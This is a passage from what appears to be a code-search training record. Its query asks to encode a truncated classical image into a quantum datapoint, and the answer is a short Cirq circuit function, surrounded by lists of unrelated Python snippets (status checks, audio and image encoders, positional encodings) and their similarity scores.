% channel)))", "def is_alive(self) -> bool:\n self.check_is_alive()\n return self.__is_alive", "def is_open(self):\n return (not self.interface.is_open)", "def is_active():\n return True", "def is_character_alive(self):\n return self.get_model.get_character.alive", "def isBusy(self):\n state = caget(self.pvBase + \":CHAN1:DeviceStatus_RBV\")\n return state != \"2\"", "def is_expired_cursor(self):\n return self._tag == 'expired_cursor'", "def busy(self) -> bool:\n return self.state != SubflowState.Available", "def check(self):\n if GPIO.input(self.number) == self.closed_state:\n current_time = now_in_ms()\n if (current_time - self.last_check_time) > self.delay:\n self.last_check_time = current_time\n return True\n return False", "def is_power_on(self):\n self._logger.debug('Getting modem state...')\n self.enable_serial_port(self.port)\n time.sleep(.8)\n self.send_command('AT')\n queue = self.serial_com.read(self.serial_com.inWaiting())\n time.sleep(.8)\n\n if 'OK' in str(queue):\n return True\n else:\n self._logger.warning('Modem is off!')\n return False", "def is_active(self):\n return not self.pending", "def alive(self):\n\n return self.subprocess.poll() is None and not self.thread_stop.is_set()", "def is_unread(self):\n return bool(self.read_at is None)", "def is_alive(self) -> bool:\n return self._main_thread.is_alive()", "def hasMACCommands(self):\n return hasattr(self, 'commands') and len(self.commands) > 0", "def active(self):\n return len(self.queue) > 0", "def check_channel_inactive(ctx: commands.Context) -> bool:\n if get_active_feature(ctx.channel) != ActivationState.INACTIVE:\n raise error_handling.ChannelAlreadyActiveError()\n else:\n return True", "def is_running(self):\n return self.action_thread and self.action_thread.is_alive()", "def is_locked(self):\n out = self.adb.get_window_policy_info()\n\n pattern = re.compile('mShowingLockscreen=(true|false)')\n return pattern.search(str(out)).group(1)", "def active(self):\n return self.starting == 0 and self.stopped == 0", "def target_is_busy(self, target_id=0):\n try:\n target = self.target(target_id=target_id)\n except:\n raise NoSuchTargetException()\n return target['state'] == \"running\"", "def isOpen(self):\n\t\treturn not self.endgame", "def is_active(self) -> bool:\r\n return self.active", "def status(self):\r\n return not self.sendQuery(\"isMoving\",\"isMoving\")", "def has_timeout(self) -> bool:\n\n return bool(self.timeout)", "def msg_ready(self):\n if self._in_queue.qsize() == 0:\n return False\n else:\n return True", "def msg_ready(self):\n if self._in_queue.qsize() == 0:\n return False\n else:\n return True", "def alive(self):\n return self._proc is not None and self._proc.poll() is None", "def is_alive(self) -> bool:\n if self._thread is None:\n return False\n return self._thread.is_alive()", "def is_alive(self):\n return hasattr(self, 'alive') and self.alive", "def is_alive(self):\n return hasattr(self, 'alive') and self.alive", "def check_is_alive(self) -> bool:\n crew_alive = False\n for operator in self.__operators:\n if operator.is_alive:\n crew_alive = True\n break\n if crew_alive and self.health > self.MIN_HEALTH:\n self.__is_alive = True\n return True\n else:\n self.__is_alive = False\n return False", "def is_running(self):\n if self._process and self._process.poll() is None:\n return True\n return False" ]
[ "0.7600817", "0.7516991", "0.7223411", "0.7089875", "0.6917131", "0.66209525", "0.6557727", "0.6422757", "0.6312891", "0.6253275", "0.62224126", "0.6158467", "0.6102417", "0.60107124", "0.5923812", "0.58288354", "0.58169097", "0.5816199", "0.5791001", "0.57627046", "0.5757289", "0.5746407", "0.5734319", "0.5691204", "0.56857747", "0.5674667", "0.565714", "0.56486446", "0.5643674", "0.5631291", "0.5628832", "0.5608774", "0.5601653", "0.55970204", "0.55919737", "0.55818564", "0.55754316", "0.5572902", "0.556618", "0.5562894", "0.5560851", "0.555285", "0.55401677", "0.55393827", "0.553278", "0.55195063", "0.5498368", "0.54878783", "0.5478399", "0.5476272", "0.5462045", "0.5456243", "0.5454226", "0.54483885", "0.543833", "0.5435219", "0.5432867", "0.54112476", "0.54030466", "0.54014844", "0.53982216", "0.53972536", "0.5395806", "0.5393668", "0.53782856", "0.53762215", "0.5346547", "0.5337494", "0.53222567", "0.53084046", "0.53059924", "0.52907664", "0.5290412", "0.5289477", "0.5288616", "0.5286823", "0.5285325", "0.52853185", "0.5281189", "0.5275186", "0.52749586", "0.5269707", "0.5266243", "0.5265541", "0.5261542", "0.52574646", "0.52574474", "0.5253014", "0.5252917", "0.5246455", "0.5245023", "0.5240202", "0.5239516", "0.5239516", "0.5227335", "0.52266085", "0.52222586", "0.52222586", "0.5220346", "0.5219579" ]
0.8497326
0
Encode a truncated classical image into a quantum datapoint.
def convert_to_circuit(x):
    y = np.arcsin(x)
    z = np.arccos(x**2)
    qubits = cirq.GridQubit.rect(5, 1)
    circuit = cirq.Circuit()
    for i in range(5):
        circuit.append(cirq.ry(y).on(qubits[i]))
        circuit.append(cirq.rz(z).on(qubits[i]))
    return circuit
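Usage note: a brief sketch of applying the encoder above to one truncated pixel value; assumes numpy and cirq are installed and that x lies in [-1, 1] so arcsin is defined. The sample value is illustrative only.

    import numpy as np
    import cirq

    x = 0.5                          # truncated classical value in [-1, 1]
    circuit = convert_to_circuit(x)  # 5 qubits, each rotated by ry/rz
    print(circuit)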
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encode(self, encode_data, image):\r\n raise NotImplementedError(\"Not Implemented\")", "def encode(self, signal: np.ndarray) -> np.ndarray:\n pass", "def encode_image(self, image):\n image = self.clip_preprocess(image).unsqueeze(0).to(self.device)\n image_features = self.clip_model.encode_image(image)\n return image_features.cpu().detach().numpy()", "def encode(cls, data):\n t, img = data\n # Cast double time into eight 8-bit integers\n#\t\tta=np.array(binary_cast([t],'d','hhhh'))\n ta = np.array(binary_cast([t], 'd', 'BBBBBBBB'))\n # Cast w,h 16-bit unsigned integers into two unsigned 8-bit integers\n cp = cls.compress(img)\n out = np.concatenate((ta, cp)).astype('B')\n return out", "def PositionEncoder(x, min_timescale=1.0, max_timescale=1.0e4):\n x = x.transpose(1, 2)\n length = x.size()[1]\n channels = x.size()[2]\n signal = get_timing_signal(length, channels, min_timescale, max_timescale)\n return (x + signal.to(x.get_device())).transpose(1, 2)", "def encode(image):\n from encoder import launch\n launch(image)", "def encode(self, image) -> bytes:\n raise NotImplementedError()", "def encode_self(self) -> np.ndarray:\n raise NotImplementedError", "def encode_scaled(data, size, version=0, level=QR_ECLEVEL_L, hint=QR_MODE_8,\n case_sensitive=True):\n version, src_size, im = encode(data, version, level, hint, case_sensitive)\n if size < src_size:\n size = src_size\n qr_size = (size / src_size) * src_size\n im = im.resize((qr_size, qr_size), Image.NEAREST)\n pad = (size - qr_size) / 2\n ret = Image.new(\"L\", (size, size), 255)\n ret.paste(im, (pad, pad))\n\n return (version, size, ret)", "def encode_dim(self):\n raise NotImplementedError", "def __init__(self, *args, **kwargs):\n super(Encoder, self).__init__(*args, **kwargs)\n self._mask = (1 << self._precision) - 1", "def image(self):\n\n return self.signal + self.noise", "def add_raw_signal(self, signal):\n assert int(signal[0]) == signal[0], \"Raw signal are always integers\"\n assert len(signal) == len(self.scaled_signal) and len(signal) == self.signal_length, \\\n \"Raw signal must be same size as scaled signal input:{} != scale:{}\".format(signal, self.scaled_signal)\n self.raw_signal = signal", "def encode(self, encode_data, image):\r\n\r\n encode_data += self.termination_sequence\r\n data = ''\r\n for char in encode_data:\r\n data += \"\".join(dec_2_bin(ord(char)))\r\n\r\n if not will_data_fit(len(data), image, sum(self.get_color_bits_used())):\r\n raise FileTooLargeException(\"Image to small for current settings.\")\r\n\r\n data_encode_pos = 0\r\n out_image = image.copy()\r\n curr_pixel_x = -1\r\n curr_pixel_y = -1\r\n for pixel in image.getdata():\r\n # This will hold the new array of R,G,B colors with the\r\n # embedded data\r\n new_col_arr = []\r\n\r\n curr_pixel_x = (curr_pixel_x + 1) % out_image.size[0]\r\n if curr_pixel_x == 0:\r\n curr_pixel_y += 1\r\n\r\n for curr_color_pos, color in enumerate(pixel):\r\n # if we still have data to encode\r\n if data_encode_pos < len(data):\r\n\r\n # Number of bits to encode for this color\r\n bits_to_encode = self.get_color_bits_used()[curr_color_pos]\r\n\r\n # Encode the number of bits requested\r\n tmp_color = dec_2_bin(color)\r\n\r\n # get the next bits (number) bits from data, reverse (may change) them and\r\n # assign them to the last bits (number) bits of the current color.\r\n if data_encode_pos + bits_to_encode > len(data):\r\n diff = data_encode_pos + bits_to_encode - len(data)\r\n # TODO: Use some intelligence to fill in with previous pixel data instead of garbage\r\n # 
We will have already encoded the termination sequence so anything here\r\n # will be ignored in decoding, so we can fill with garbage.\r\n data += ('0' * diff)\r\n\r\n # If the bits to encode for a channel is zero, don't change anything.\r\n if bits_to_encode != 0:\r\n tmp_color[-bits_to_encode:] = self.get_encode_data_bits(data, data_encode_pos, bits_to_encode)\r\n\r\n data_encode_pos += bits_to_encode\r\n\r\n # Pull out a new int value for the encoded color\r\n new_col = bin_2_dec(\"\".join(tmp_color))\r\n else:\r\n new_col = color\r\n\r\n # Append the new color to our new pixel array\r\n new_col_arr.append(new_col)\r\n\r\n # Append the new 3 color array to our new image data\r\n out_image.putpixel((curr_pixel_x, curr_pixel_y), tuple(new_col_arr))\r\n\r\n return out_image", "def preprocess(image, min_size=600, max_size=1000):\n normalize = tf.Normalize(mean=[0.485, 0.456, 0.406],\n \tstd=[0.229, 0.224, 0.225])\n\n\n C, H, W = image.shape\n scale1 = min_size / min(H, W)\n scale2 = max_size / max(H, W)\n scale = min(scale1, scale2)\n image = image / 255.\n image = sktsf.resize(image, (C, H * scale, W * scale), mode='reflect',anti_aliasing=False)\t#change this to torch\n # both the longer and shorter should be less than\n # max_size and min_size\n\n image = normalize(t.from_numpy(image))\n return image.numpy()", "def normalize(image):\r\n return image / 127.5 - 1.", "def EncodeSingleChannel(data,codingParams,iCh):\n # NEW: Determine block type and set a,b\n if(codingParams.blocksize < 2):\n b = codingParams.longBlockSize/2\n else:\n b = codingParams.shortBlockSize/2\n if(codingParams.blocksize == 1 or codingParams.blocksize == 2):\n a = codingParams.shortBlockSize/2\n else:\n a = codingParams.longBlockSize/2\n N = a+b\n halfN = N/2\n #print \"A: \", a\n #print \"B: \", b\n #print \"halfN: \", halfN\n\n # Reclaim nScaleBits from bands with 0 lines\n # vary bark width of bands\n # pass different flimits to AssignMDCTLines...\n\n nScaleBits = codingParams.nScaleBits\n maxMantBits = (1<<codingParams.nMantSizeBits) # 1 isn't an allowed bit allocation so n size bits counts up to 2^n\n if maxMantBits>16: maxMantBits = 16 # to make sure we don't ever overflow mantissa holders\n # vectorizing the Mantissa function call\n# vMantissa = np.vectorize(Mantissa)\n sfBands = codingParams.sfBands\n\n # NEW compute target bit rate based on block type\n bitBudget = codingParams.targetBitsPerSample * halfN # this is overall target bit rate\n #bitBudget -= nScaleBits*(sfBands.nBands + 1) # less scale factor bits (including overall scale factor)\n #bitBudget -= codingParams.nMantSizeBits*sfBands.nBands # less mantissa bit allocation bits\n #bitBudget -= 2 # block ID size TODO: make this a variable\n\n if codingParams.doSBR == True:\n # Calculate Spectral Envelope based on original signal\n specEnv = calcSpecEnv(data,codingParams.sbrCutoff,codingParams.sampleRate)\n # Append in spectral envelope for this channel into empty container\n codingParams.specEnv[iCh][:] = specEnv\n\n #Decimate and lowpass signal by factor determined by cutoff frequency\n doDecimate = False\n if doDecimate==True:\n Wc = codingParams.sbrCutoff/float(codingParams.sampleRate/2.)# Normalized cutoff frequency\n B,A = signal.butter(4,Wn)\n data = signal.lfilter(B,A,data)\n\n # window data for side chain FFT and also window and compute MDCT\n timeSamples = data\n # Window data based on block size\n mdctTimeSamples = np.append(SineWindow(np.append(timeSamples[:a],np.zeros(a)))[:a],SineWindow(np.append(np.zeros(b),timeSamples[a:]))[b:])\n # Call 
MDCT with a, b reflecting block size\n mdctLines = MDCT(mdctTimeSamples, a, b)\n\n # compute overall scale factor for this block and boost mdctLines using it\n maxLine = np.max( np.abs(mdctLines) )\n overallScale = ScaleFactor(maxLine,nScaleBits) #leading zeroes don't depend on nMantBits\n mdctLines *= (1<<overallScale)\n\n # compute the mantissa bit allocations\n # compute SMRs in side chain FFT\n SMRs = CalcSMRs(timeSamples, mdctLines, overallScale, codingParams.sampleRate, sfBands)\n #print \"BitBudget: \", bitBudget\n if codingParams.doSBR == True:\n # Critical band starting here are above cutoff\n cutBin = freqToBand(codingParams.sbrCutoff)\n # perform bit allocation using SMR results\n bitAlloc = BitAllocSBR(bitBudget, maxMantBits, sfBands.nBands, sfBands.nLines, SMRs, codingParams.bitReservoir, codingParams.blocksize, cutBin)\n else:\n bitAlloc = BitAlloc(bitBudget, maxMantBits, sfBands.nBands, sfBands.nLines, SMRs, codingParams.bitReservoir, codingParams.blocksize)\n codingParams.bitReservoir += bitBudget - np.sum(bitAlloc * sfBands.nLines)\n #print \"blocksize: \", codingParams.blocksize\n #print \"Bit Reservoir: \", codingParams.bitReservoir\n #if codingParams.blocksize == 2:\n # print bitAlloc\n # given the bit allocations, quantize the mdct lines in each band\n scaleFactor = np.empty(sfBands.nBands,dtype=np.int32)\n nMant = halfN\n\n for iBand in range(sfBands.nBands):\n if not bitAlloc[iBand]: nMant-= sfBands.nLines[iBand] # account for mantissas not being transmitted\n mantissa=np.empty(nMant,dtype=np.int32)\n iMant=0\n for iBand in range(sfBands.nBands):\n lowLine = sfBands.lowerLine[iBand]\n highLine = sfBands.upperLine[iBand] + 1 # extra value is because slices don't include last value\n nLines= sfBands.nLines[iBand]\n if(highLine - lowLine > 0):\n scaleLine = np.max(np.abs( mdctLines[lowLine:highLine] ) )\n else:\n scaleLine = abs(mdctLines[lowLine])\n scaleFactor[iBand] = ScaleFactor(scaleLine, nScaleBits, bitAlloc[iBand])\n if bitAlloc[iBand]:\n mantissa[iMant:iMant+nLines] = vMantissa(mdctLines[lowLine:highLine],scaleFactor[iBand], nScaleBits, bitAlloc[iBand])\n iMant += nLines\n # end of loop over scale factor bands\n\n # return results\n return (scaleFactor, bitAlloc, mantissa, overallScale)", "def encoder(self, value):\n self._tensor.encoder = value", "def _quantize(self) :\n self.A[self.A <= self.thr] = -1\n self.A[self.A > self.thr] = 1\n self.A = self.A.astype(\"int\")", "def encode(self, y):\n raise NotImplementedError", "def denormalize_data_unit_interval(data):\n if data.dtype == 'uint8':\n return\n return (data * 255.0).astype('uint8')", "def EncoderImage(config):\n\n # data_name, img_dim, embed_size, finetune=False,\n # cnn_type='vgg19', use_abs=False, no_imgnorm=False):\n\n embed_size = config['model']['embed-size']\n order_embeddings = config['training']['measure'] == 'order'\n if config['image-model']['name'] == 'bottomup':\n transformer_layers = config['image-model']['transformer-layers']\n pos_encoding = config['image-model']['pos-encoding']\n visual_feat_dim = config['image-model']['feat-dim']\n dropout = config['image-model']['dropout']\n img_enc = TransformerPostProcessing(transformer_layers, visual_feat_dim, embed_size, n_head=4, aggr='mean', pos_encoding=pos_encoding, dropout=dropout, order_embeddings=order_embeddings)\n else:\n img_enc = None\n\n return img_enc", "def reScaleLandsat(self,img):\n \n\t\tthermalBand = ee.List(['thermal'])\n\t\tthermal = ee.Image(img).select(thermalBand).multiply(10)\n \n\t\totherBands = 
ee.Image(img).bandNames().removeAll(thermalBand)\n\t\tscaled = ee.Image(img).select(otherBands).divide(0.0001)\n \n\t\timage = ee.Image(scaled.addBands(thermal)).int16()\n \n\t\treturn image.copyProperties(img)", "def _define_encoder(self):\n self.encoder = nn.Sequential(View((-1, 64 * 64 * 3)),\n nn.Linear(64 * 64 * 3, 5120, bias=False), nn.SELU(),\n nn.BatchNorm1d(5120),\n nn.Linear(5120, 2560, bias=False), nn.SELU(),\n nn.BatchNorm1d(2560),\n nn.Linear(2560, 512, bias=False), nn.SELU(),\n nn.BatchNorm1d(512),\n nn.Linear(512, 128, bias=False), nn.SELU(),\n nn.BatchNorm1d(128),\n nn.Linear(128, self.encoding_shape, bias=False), nn.SELU(),\n )", "def make_encoder(self, input_size: int, latent_size: int) -> nn.Module:\n pass", "def augment(self, image):\n pass", "def encode(\n self,\n x_param,\n signal_end_time,\n tolerance=1e-8,\n ):\n\n self.__dict__.update(self.params.__dict__)\n\n discrete_encoder = DiscreteEncoder(self.params)\n # TODO need to find smarter way of setting delta_t, also depending on size of signal and b\n delta_t = (2 * np.pi / x_param.max_frequency) / 100\n approx_spikes = discrete_encoder.encode(x_param, signal_end_time, delta_t)\n\n y_param = x_param.get_mixed_signals(self.mixing_matrix)\n spikes = SpikeTimes(self.n_channels)\n\n def fun(\n integral_end_time,\n signal,\n channel,\n integral_start_time,\n ):\n weighted_integral = self._get_weighted_integral(\n signal,\n channel,\n integral_start_time,\n integral_end_time,\n )\n return (2 * self._delta[channel] - weighted_integral) ** 2\n\n for ch in range(self.n_channels):\n last_spike = 0\n spikes_of_ch = approx_spikes[ch]\n\n for i_s, s in enumerate(spikes_of_ch):\n next_spike = scipy.optimize.minimize(\n fun,\n s,\n (y_param, ch, last_spike),\n bounds=[\n (\n spikes_of_ch[i_s - 1] if i_s > 0 else 0,\n spikes_of_ch[i_s + 1]\n if i_s < len(spikes_of_ch) - 1\n else signal_end_time,\n )\n ],\n tol=tolerance,\n ).x[0]\n spikes.add(ch, next_spike)\n last_spike = next_spike\n return spikes", "def normalize(image):\n return image / 127.5 - 1.", "def postprocess_img(img):\n img = img.transpose((1, 2, 0))\n img += 1.0\n img = (img * 128.0).astype(np.uint8)\n return img", "def get_scaled_image(self, min_width=1024):\n self.dispersion = self.image.getCalibration().pixelWidth\n self.offset = self.image.getCalibration().xOrigin\n binning = 1\n while binning * min_width < self.image.getWidth():\n binning *= 2\n if binning > 1:\n binning /= 2\n IJ.run(self.image, 'Select None', '')\n new_image = self.image.crop()\n IJ.run(new_image, 'Bin...', 'x=%d y=%d binning=Average' %\n (binning, binning))\n self.dispersion *= binning\n self.offset /= binning\n self.image = new_image\n return new_image", "def getEncode(self, img):\n img_ = self.preprocess(img)\n fv = self.model_.predict(img_)\n fv = fv.reshape(-1, 1)\n return fv", "def _define_encoder(self):\n raise NotImplementedError", "def EncoderImage(data_name, img_dim, embed_size, finetune=False,\n cnn_type='resnet', use_abs=False, no_imgnorm=False):\n if data_name.endswith('precomp'):\n img_enc = EncoderImagePrecomp(\n img_dim, embed_size, use_abs, no_imgnorm)\n else:\n img_enc = EncoderImageFull(\n embed_size, finetune, cnn_type, use_abs, no_imgnorm)\n\n return img_enc", "def encode_dataset(batch_size,downscale_factor,dataset, pooling_function):\n \n n,l=np.shape(dataset)\n f=downscale_factor\n n_batches=n//batch_size\n batches=np.linspace(1,n_batches,n_batches, dtype=int) * batch_size\n\n gaf = GramianAngularField(image_size=1., method='summation')\n \n print('Encoding started...')\n 
for p in range(n_batches):\n if p==0:\n X_gaf = gaf.transform(dataset[0:batches[p],:])\n sample=block_reduce(X_gaf[0], block_size=(f, f), func=pooling_function)\n l_red = sample.shape[0]\n X_gaf_red = np.zeros((n,l_red,l_red))\n print('output 3D Matrix shape: ', np.shape(X_gaf_red))\n\n j=0\n for i in range(0,batches[p]):\n X_gaf_red[i] = block_reduce(X_gaf[j], block_size=(f, f) , func=pooling_function)\n j+=1\n\n else: \n X_gaf = gaf.transform(X[batches[p-1]:batches[p],:])\n\n j=0\n for i in range(batches[p-1],batches[p]):\n X_gaf_red[i] = block_reduce(X_gaf[j], block_size=(f, f) , func=pooling_function)\n j+=1\n \n print('Encoding successful!')\n print('#####################################')\n \n return X_gaf_red", "def preprocess(img_name, quality=None):\n img = plt.imread(img_name)\n Y, X, C = img.shape\n img = img[:Y-Y%2, :X-X%2, :3]\n if quality is not None:\n img = jpeg_compress(img, quality)\n img = img_to_tensor(img).cuda().type(torch.float)\n return img", "def __resize_to_512(input_data):\n test_size = 720\n\n if DataAugmentor._is_synthtext(input_data):\n input_data['contour'] = [[np.cast['int32'](np.stack([contour[:, :, 0] * 512 / input_data['img'].shape[0],\n contour[:, :, 1] * 512 / input_data['img'].shape[1]],\n axis=-1))\n for contour in contours] for contours in input_data['contour']]\n else:\n input_data['contour'] = [np.cast['int32'](np.stack([contour[:, :, 0] * 512 / input_data['img'].shape[0],\n contour[:, :, 1] * 512 / input_data['img'].shape[1]],\n axis=-1)) for contour in input_data['contour']]\n input_data['center_point'] = [(np.cast['int32'](point[0] * 512 / input_data['img'].shape[0]),\n np.cast['int32'](point[1] * 512 / input_data['img'].shape[1]))\n for point in input_data['center_point']]\n\n seq = iaa.Sequential([\n iaa.Scale({'height': 512, 'width': 512}, 'cubic')\n ])\n input_data['img'] = seq.augment_image(input_data['img'])\n\n return input_data", "def normalize(img):\n\n def normalize_pixel(x):\n return (x - 128) / 128\n\n normalize_vector = np.vectorize(normalize_pixel)\n return normalize_vector(img)", "def process_image(self, image):\r\n img = cv2.imread(image)\r\n img = img.astype(float)/127 - 1\r\n return np.expand_dims(img, axis=0)", "def get_position_encoding(\n length, hidden_size, min_timescale=1.0, max_timescale=1.0e4):\n import math\n position = tf.to_float(tf.range(length))\n num_timescales = hidden_size // 2\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n (tf.to_float(num_timescales) - 1))\n inv_timescales = min_timescale * tf.exp(\n tf.to_float(tf.range(num_timescales)) * -log_timescale_increment)\n scaled_time = tf.expand_dims(position, 1) * tf.expand_dims(inv_timescales, 0)\n signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)\n return signal", "def write(self, image):\n raise NotImplementedError()", "def encode(self, x):\n self.eval()\n x = torch.as_tensor(x).unsqueeze(0)\n if self.do_mt:\n enc_output, _ = self.encoder_mt(x, None)\n else:\n enc_output, _ = self.encoder(x, None)\n return enc_output.squeeze(0)", "def preprocess(img):\n \n scaler=StandardScaler() ## scaler object to perform preprocessing\n img=scaler.fit_transform(img) ## zero-center and normalize\n \n return img", "def mulaw_quantize(x, quantization_channels=256):\n mu = quantization_channels - 1\n if isinstance(x, np.ndarray):\n x_mu = np.sign(x) * np.log1p(mu * np.abs(x)) / np.log1p(mu)\n x_mu = ((x_mu + 1) / 2 * mu + 0.5).astype(int)\n elif isinstance(x, (torch.Tensor, torch.LongTensor)):\n\n if isinstance(x, 
torch.LongTensor):\n x = x.float()\n mu = torch.FloatTensor([mu])\n x_mu = torch.sign(x) * torch.log1p(mu * torch.abs(x)) / torch.log1p(mu)\n x_mu = ((x_mu + 1) / 2 * mu + 0.5).long()\n return x_mu", "def encode(self, x):\n mu = []\n logvar = []\n for i in range(self.n_views):\n mu_, logvar_ = self.encoders[i](x[i])\n mu.append(mu_)\n logvar.append(logvar_)\n mu = torch.stack(mu)\n logvar = torch.stack(logvar)\n mu_out, logvar_out = self.join_z(mu, logvar)\n qz_x = hydra.utils.instantiate( \n self.cfg.encoder.default.enc_dist, loc=mu_out, scale=logvar_out.exp().pow(0.5)\n )\n return [qz_x]", "def process(self, image, annotation_meta=None):\n # image dasta stored inside DataRepresentation in data field\n data = image.data\n # internally we work with numpy arrays, so we need to convert it to pillow image object for making resize\n resized_data = Image.fromarray(data).resize((self.size, self.size), Image.ANTIALIAS)\n # return back data to numpy array\n data = np.array(resized_data)\n # expand dims for gray scale image\n if len(data.shape) == 2:\n data = np.expand_dims(data, axis=-1)\n image.data = data\n # return updated DataRepresentation\n return image", "def preprocess_image(image):\n\n image = tf.to_float(image)\n image = tf.subtract(image, 128.0)\n image = tf.div(image, 128.0)\n return image", "def encode(self, img):\n with tf.variable_scope('encoder'):\n #conv1 = self.conv_layer(\n # img, [5, 5], [3, 32], stride=2, initializer_type=1, name='conv1')\n #conv2 = self.conv_layer(\n # conv1, [5, 5], [32, 32], stride=2, initializer_type=1, name='conv2')\n conv3 = self.conv_layer(\n img, [5, 5], [self.in_channels, 64], stride=2, initializer_type=1, name='conv3')\n #conv4 = self.conv_bn_layer(\n conv4 = self.conv_layer(\n conv3, [5, 5], [64, 128], stride=2, #is_training=self.is_training,\n initializer_type=1, name='conv4')\n #conv5 = self.conv_bn_layer(\n conv5 = self.conv_layer(\n conv4, [5, 5], [128, 256], stride=2, #is_training=self.is_training,\n initializer_type=1, name='conv5')\n shape = conv5.get_shape().as_list()\n feature_map_size = shape[1]*shape[2]*shape[3]\n conv5_flat = tf.reshape(\n conv5, [-1, feature_map_size], 'conv5_flat')\n #fc6 = self.fc_bn_layer(conv5_flat, 1024, is_training=self.is_training,\n fc6 = self.fc_layer(conv5_flat, 1024,\n initializer_type=1, name='fc6')\n #fc7 = self.fc_layer(fc6, 1024, initializer_type=1, name='fc7')\n return fc6, shape", "def adjust(self, image):\n ...", "def encode(self, data, scaling=True):\n\n encoded = encode_data(data,\n self._codec['datas'],\n self._codec['formats'],\n scaling)\n encoded |= (0x80 << (8 * self._length))\n encoded = hex(encoded)[4:].rstrip('L')\n\n return binascii.unhexlify(encoded)[:self._length]", "def normalize(self) -> \"CharacterizationPixel\":\n return replace(\n self,\n data=self.data/self.norm,\n mean=self.mean/self.norm,\n norm=np.ones_like(self.norm),\n )", "def encode(self, signal: np.ndarray, window: int = None, threshold: float = None) -> np.ndarray:\n\n # Initializing the spike train to be an array of zeros with same number of timesteps as the signal.\n spikes = np.zeros(signal.shape, dtype=np.int8)\n\n # If window value is passed to the function, it is used. Otherwise window value passed during initalization is used.\n if window == None:\n window = self.window\n\n # If threshold value is passed to the function, it is used. 
Otherwise threshold value passed during initalization is used.\n if threshold == None:\n threshold = self.threshold\n\n # Saving the first value of the `signal` for `decode()`.\n self.initial_val = signal[0]\n\n # `base` stores sliding window mean\n rolling_mean = uniform_filter1d(signal, window)[\n (window//2):signal.size-((window-1)//2)]\n base = np.concatenate(\n (np.full(window-1, rolling_mean[0]), rolling_mean))\n\n # Wherever difference between signal and base is more than threshold, spike is encoded.\n spikes = np.where(signal > base+threshold, 1, spikes)\n spikes = np.where(signal < base-threshold, -1, spikes)\n\n # Returns spike train.\n return spikes", "def encode(self, x: Tensor) ->Tensor:\n return self.encoder(x)[0]", "def quantize(image_patch, gray_levels=12, n_stddev=2):\n # compute gray level gaussian stats\n mean = np.mean(image_patch)\n stddev = np.std(image_patch)\n # logger.debug('mean: {!s}\\nstd dev: {!s}'.format(mean, stddev))\n bin_width = 2*n_stddev*stddev / (gray_levels-2)\n # logger.debug('bin_width: {!s}'.format(bin_width))\n\n # rebin values into new quanization, first and last bins hold outliers\n quantized_image_patch = np.zeros_like(image_patch, dtype=np.int8)\n it = np.nditer(image_patch, op_flags=['readwrite'], flags=['multi_index'])\n while not it.finished:\n val = image_patch[it.multi_index]\n quantized_image_patch[it.multi_index] = min(gray_levels-1, max(0, math.floor(((val - mean + n_stddev*stddev)/(bin_width+1e-9))+1)))\n it.iternext()\n\n # import matplotlib.pyplot as plt\n # xy_shape = quantized_image_patch.shape[1:]\n # for z in range(quantized_image_patch.shape[0]):\n # fig = plt.figure()\n # ax = fig.add_subplot(1,2,1)\n # ax.imshow(image_patch[z,:,:].reshape(xy_shape), cmap='gray')\n # ax = fig.add_subplot(1,2,2)\n # ax.imshow(quantized_image_patch[z,:,:].reshape(xy_shape), cmap='gray', vmin=0, vmax=gray_levels-1)\n # plt.show()\n return quantized_image_patch", "def scale(self):", "def compress(self, tensor):", "def data64(self, value: str) -> None:\n self.data = Image.decode64(value)", "def _encode_img_observation(self, idx):\n hi = idx + 1 # make noninclusive\n lo = hi - self.obs_len\n\n for i in range(lo, hi - 1):\n if self.dones[i % self._maxsize]:\n lo = i + 1\n missing = self.obs_len - (hi - lo)\n\n # We need to duplicate the lo observation\n if missing > 0:\n frames = [self.states[lo % self._maxsize] for _ in range(missing)]\n for i in range(lo, hi):\n frames.append(self.states[i % self._maxsize])\n stack_state = np.stack(frames, axis=-1)\n # We are on the boundary of the buffer\n elif lo < 0:\n frames = [self.states[lo:], self.states[:hi]]\n frames = np.concatenate(frames, 0)\n stack_state = frames.transpose((1, 2, 0))\n # The standard case\n else:\n stack_state = self.states[lo:hi].transpose((1, 2, 0))\n\n assert stack_state.shape == (84, 84, 4)\n return stack_state", "def quantize(im_orig, n_quant, n_iter):\n shape_len = len(im_orig.shape)\n if shape_len == 2: # grayscale\n return quantization_helper(im_orig, n_quant, n_iter)\n\n elif shape_len == 3: # rgb\n im_yiq = rgb2yiq(im_orig)\n y = im_yiq[:, :, 0]\n y_quant, error = quantization_helper(y, n_quant, n_iter)\n y_quant = y_quant/ 255\n im_yiq[:, :, 0] = y_quant\n im_quants = yiq2rgb(im_yiq)\n return im_quants, error", "def get_position_encoding(\n length, hidden_size, min_timescale=1.0, max_timescale=1.0e4):\n position = tf.cast(tf.range(length), dtype=tf.float32)\n num_timescales = hidden_size // 2\n log_timescale_increment = (\n math.log(float(max_timescale) / 
float(min_timescale)) /\n (tf.cast((num_timescales) - 1, dtype=tf.float32)))\n inv_timescales = min_timescale * tf.exp(\n tf.cast(tf.range(num_timescales), dtype=tf.float32) * -log_timescale_increment)\n scaled_time = tf.expand_dims(position, 1) * tf.expand_dims(inv_timescales, 0)\n signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)\n return signal", "def encode(self):\n with tf.name_scope(\"encode\"):\n self.encoder_inputs = tf.layers.dense(\n inputs=self.encoder_inputs,\n units=self.options['hidden_size'], activation=None, use_bias=True,\n kernel_initializer=tf.keras.initializers.he_normal(seed=None),\n bias_initializer=tf.zeros_initializer(),\n kernel_regularizer=None, bias_regularizer=None, activity_regularizer=None,\n kernel_constraint=None, bias_constraint=None, trainable=True,\n name=None, reuse=None)\n self.encoder_inputs = tf.layers.batch_normalization(self.encoder_inputs,\n axis=-1,\n momentum=0.99,\n epsilon=0.001,\n center=True,\n scale=True,\n beta_initializer=tf.zeros_initializer(),\n gamma_initializer=tf.ones_initializer(),\n moving_mean_initializer=tf.zeros_initializer(),\n moving_variance_initializer=tf.ones_initializer(),\n training=self.is_training,\n trainable=True,\n renorm=False,\n renorm_momentum=0.99)\n # Prepare inputs to the layer stack by adding positional encodings and\n # applying dropout.\n # embedded_inputs = self.embedding_softmax_layer(inputs)\n #\n inputs_padding = transformer_model_utils.get_padding(tf.cast(\n tf.reduce_max(100*self.encoder_inputs, [-1]),\n dtype=tf.int32))\n\n 